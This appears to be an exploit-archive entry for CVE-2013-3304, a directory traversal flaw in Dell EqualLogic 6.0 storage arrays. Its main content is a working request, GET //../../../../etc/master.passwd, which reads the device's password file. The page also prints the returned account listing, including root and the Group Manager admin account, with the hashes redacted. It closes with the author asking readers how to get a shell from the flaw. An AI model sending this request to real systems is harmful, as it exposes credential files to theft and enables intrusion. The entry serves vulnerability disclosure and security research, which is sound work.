Skip to content
cyberexploits
webapphardwaretext

Dell EqualLogic Storage - Directory Traversal

Dell EqualLogic Storage - Directory Traversal

Published on 2014-10-25

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/35056.txt7eac4c3a
raw
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0

Storage

# Date: 09/2013

# Exploit Author: Mauricio Pampim Corr�a

# Vendor Homepage: www.dell.com

# Version: 6.0

# Tested on: Equipment Model Dell EqualLogic PS4000

# CVE : CVE-2013-3304



 



The malicious user sends



 



GET //../../../../../../../../etc/master.passwd



 



 



 



And the Dell Storage answers



 



root:[hash] &:/root:/bin/sh

daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin

operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin

bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin

sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin

uucp:*:[hash]:UNIX-to-UNIX

Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico

nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin

grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli

authgroup:[hash]:Group Authenication Account:/:/sbin/nologin



 



 



More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50



 



Could obtain shell with flaw? send me an email telling me how, to

mauricio[at]xlabs.com.br



 



Thanks



View on GitHub
Dell EqualLogic Storage - Directory Traversal · CyberExploits